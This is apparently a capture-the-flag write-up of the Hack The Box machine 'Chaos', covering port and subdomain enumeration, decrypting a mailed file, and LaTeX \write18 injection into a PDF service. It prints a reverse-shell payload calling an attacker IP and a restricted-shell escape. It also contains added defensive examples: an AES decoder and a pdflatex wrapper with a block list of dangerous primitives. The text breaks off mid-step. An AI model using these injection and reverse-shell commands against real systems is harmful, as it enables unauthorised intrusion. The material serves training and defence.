$ nmap -p- --min-rate 5000 10.129.253.192
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-05 13:03 +08
Nmap scan report for 10.129.253.192
Host is up (0.0076s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
110/tcp open pop3
143/tcp open imap
993/tcp open imaps
995/tcp open pop3s
10000/tcp open snet-sensor-mgmt
Mail ports and Webmin on port 10000 are open. I might need to read mail messages for credentials later. I also did a detailed scan of the open ports:
$ nmap -p 80,110,143,993,995,10000 -sC -sV --min-rate 5000 chaos.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-05 13:06 +08
Nmap scan report for chaos.htb (10.129.253.192)
Host is up (0.0061s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Chaos
|_http-server-header: Apache/2.4.34 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: PIPELINING TOP UIDL SASL AUTH-RESP-CODE STLS RESP-CODES CAPA
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
143/tcp open imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_imap-capabilities: have LOGINDISABLEDA0001 IDLE Pre-login more LITERAL+ post-login ENABLE capabilities listed ID LOGIN-REFERRALS IMAP4rev1 STARTTLS OK SASL-IR
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: have IDLE AUTH=PLAINA0001 more LITERAL+ post-login ENABLE capabilities listed ID LOGIN-REFERRALS IMAP4rev1 Pre-login OK SASL-IR
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) AUTH-RESP-CODE USER RESP-CODES CAPA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.890
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I added chaos.htb to my /etc/hosts file since there's a DNS name returned from the above scan.
Web Enum -> Mail Creds
Visiting the IP address alone blocks us:
Visiting chaos.htb shows us a typical security company page:
The website looked rather static, so I ran a gobuster directory scan and a wfuzz subdomain scan. The gobuster scan returned nothing of interest, while the wfuzz scan did return a webmail subdomain.
$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh=73 -H 'Host:FUZZ.chaos.htb' http://chaos.htb
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://chaos.htb/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000005: 200 120 L 386 W 5607 Ch "webmail"
I also did a gobuster scan with the IP address of the machine as the URL, and found a WordPress site:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.253.192 -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.253.192
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/08/05 13:12:44 Starting gobuster in directory enumeration mode
===============================================================
/wp (Status: 301) [Size: 313] [-> http://10.129.253.192/wp/]
The WordPress site was rather simple as well, and just contained one locked article:
I didn't have a password yet, so I ran wpscan against the URL and found one user named human:
The message says "You are the password XD", meaning that sahay is the password for the AES-encrypted file. The encryption script writes the file size as the first 16 bytes, followed by the 16-byte IV, and the AES key is the SHA256 hash of sahay.
Decrypting the file outputs a base64-encoded string, which decodes to a hidden URL:
$ python3 dec.py | base64 -d
Hii Sahay
Please check our new service which create pdf
p.s - As you told me to encrypt important msg, i did :)
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Thanks,
Ayush
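As an added example (not the author's dec.py, which the post does not show), here is the container format described above reconstructed in Python with the cryptography package: a 16-byte size field, a 16-byte IV, then the AES-CBC body under the SHA-256 of the password. The size field is assumed to be a zero-padded ASCII decimal and the body to be padded up to a block boundary; both are assumptions of this example, and the sample blob is constructed inline rather than taken from the box.

```python
import hashlib
import os
from typing import Optional, Tuple

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

BLOCK = 16  # AES block size; also the width of the size field and of the IV


def derive_key(password: str) -> bytes:
    # Key scheme as described in the write-up: a raw SHA-256 of the password.
    # No salt and no work factor, so anyone who can guess the hint has the key.
    return hashlib.sha256(password.encode("utf-8")).digest()


def parse_container(blob: bytes) -> Tuple[int, bytes, bytes]:
    """Split a blob into (plaintext_size, iv, ciphertext).

    Layout per the write-up: 16-byte size field, 16-byte IV, AES-CBC body.
    The size field is assumed (by this example, not stated on the page) to be
    a zero-padded ASCII decimal such as b'0000000000000056'.
    """
    if len(blob) < 2 * BLOCK:
        raise ValueError("container shorter than size field + IV")
    size_field, iv, body = blob[:BLOCK], blob[BLOCK:2 * BLOCK], blob[2 * BLOCK:]
    if not size_field.isdigit():
        raise ValueError("size field is not an ASCII decimal")
    if len(body) % BLOCK:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    size = int(size_field)
    if size > len(body):
        raise ValueError("declared size exceeds ciphertext length")
    return size, iv, body


def decrypt_container(blob: bytes, password: str) -> bytes:
    """Decrypt a container and return exactly the declared number of bytes."""
    size, iv, body = parse_container(blob)
    dec = Cipher(algorithms.AES(derive_key(password)), modes.CBC(iv)).decryptor()
    plain = dec.update(body) + dec.finalize()
    # Trailing pad bytes are dropped by trusting the declared size, so the
    # encoder's choice of pad byte does not matter to the reader.
    return plain[:size]


def encrypt_container(plaintext: bytes, password: str, iv: Optional[bytes] = None) -> bytes:
    """Constructed counterpart, used only to build sample input for this demo."""
    iv = iv or os.urandom(BLOCK)
    pad = (-len(plaintext)) % BLOCK
    padded = plaintext + b" " * pad  # pad to a block boundary; size field truncates it later
    enc = Cipher(algorithms.AES(derive_key(password)), modes.CBC(iv)).encryptor()
    size_field = str(len(plaintext)).zfill(BLOCK).encode("ascii")
    return size_field + iv + enc.update(padded) + enc.finalize()


# Constructed sample: a short note encrypted under the password from the post.
SAMPLE_PASSWORD = "sahay"
SAMPLE_PLAINTEXT = b"Hii Sahay\nPlease check our new service which create pdf\n"
SAMPLE_IV = bytes(range(BLOCK))  # fixed IV only so the sample is reproducible
SAMPLE_BLOB = encrypt_container(SAMPLE_PLAINTEXT, SAMPLE_PASSWORD, iv=SAMPLE_IV)

if __name__ == "__main__":
    print(decrypt_container(SAMPLE_BLOB, SAMPLE_PASSWORD).decode("utf-8"))
```

The weak point from a defender's view is derive_key: a single unsalted SHA-256 of a dictionary word means the file is protected only as long as the hint in the mailbox stays private. A password-based KDF with a salt and a work factor (scrypt or Argon2) would at least make guessing expensive, and a MAC over the ciphertext would let the reader reject tampered files instead of silently producing garbage.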
PDF -> RCE
The URL leads to a simple PDF maker:
Sending requests doesn't seem to do anything, so I took a look at the traffic in Burp Suite:
The response reveals that it is running an outdated version of pdfTeX. There are multiple LaTeX injection methods we can use to get RCE:
I used \immediate\write18{id} to test, and it worked:
Using \immediate\write18{bash -c 'bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'} will get us a reverse shell:
ayush@chaos:/home$ echo $PATH
/home/ayush/.app
ayush@chaos:/home$ ls -la
rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
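The \write18 injection above only works because the PDF service runs pdfTeX with shell escape enabled and feeds it user input as TeX source. As an added example that is not part of the write-up or of the service on the box, here is how such an endpoint could screen submissions and invoke pdflatex with shell escape disabled. The pdflatex flags are real; the function names, the primitive list and the sample inputs are this example's own.

```python
import re
import shutil
import subprocess
import tempfile
from pathlib import Path
from typing import List

# Primitives that let a TeX job reach outside the document. \write18 is the
# shell escape used in the write-up; the file primitives are bounded by the
# openin_any / openout_any settings in texmf.cnf, but a PDF-from-user-input
# service has no reason to accept them at all.
DANGEROUS = {
    r"\write18": re.compile(r"(?:\\immediate\s*)?\\write\s*18"),
    r"\openout": re.compile(r"\\openout\b"),
    r"\openin": re.compile(r"\\openin\b"),
    r"\input": re.compile(r"\\input\b"),
    r"\include": re.compile(r"\\include\b"),
}


def find_dangerous_primitives(tex: str) -> List[str]:
    """Return the names of risky primitives present in a submitted source."""
    return [name for name, rx in DANGEROUS.items() if rx.search(tex)]


def render_pdf(tex: str, pdflatex: str = "pdflatex", timeout: int = 20) -> bytes:
    """Render untrusted TeX with shell escape off, inside a throwaway directory.

    Raises ValueError when the screen rejects the source and RuntimeError when
    pdflatex is missing or the run fails.
    """
    hits = find_dangerous_primitives(tex)
    if hits:
        raise ValueError("rejected submission: " + ", ".join(hits))
    if shutil.which(pdflatex) is None:
        raise RuntimeError("pdflatex is not installed")
    with tempfile.TemporaryDirectory() as work:
        src = Path(work) / "job.tex"
        src.write_text(tex, encoding="utf-8")
        cmd = [
            pdflatex,
            "-no-shell-escape",          # the actual control: \write18 is a no-op
            "-halt-on-error",
            "-interaction=batchmode",    # never wait on the terminal
            "-output-directory", work,
            src.name,
        ]
        proc = subprocess.run(cmd, cwd=work, capture_output=True, timeout=timeout)
        pdf = Path(work) / "job.pdf"
        if proc.returncode != 0 or not pdf.exists():
            raise RuntimeError("pdflatex failed")
        return pdf.read_bytes()


# Constructed samples: the probe from the write-up and a harmless document.
INJECTED = r"\immediate\write18{id}"
BENIGN = r"\documentclass{article}\begin{document}Hello\end{document}"

if __name__ == "__main__":
    for label, sample in (("injected", INJECTED), ("benign", BENIGN)):
        print(label, find_dangerous_primitives(sample))
```

Pattern matching on its own is not a sufficient control, because TeX can build control sequences at run time; the real mitigation is -no-shell-escape (or shell_escape = f in texmf.cnf), a throwaway working directory and a timeout, while the screen mainly gives you a signal to log and alert on before anything is compiled.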
Using tab completion, we can list the commands the restricted shell lets us run:
! echo printf
./ elif pushd
: else pwd
[ enable read
[[ esac readarray
]] eval readonly
{ exec return
} exit select
alias export set
bg false shift
bind fc shopt
break fg source
builtin fi suspend
caller for tar
case function test
cd getopts then
command hash time
command_not_found_handle help times
compgen history trap
complete if true
compopt in type
continue jobs typeset
coproc kill ulimit
declare let umask
dir local unalias
dirs logout unset
disown mapfile until
do ping wait
done popd while
I noticed that ayush can run tar, which allows us to escape the restricted shell using: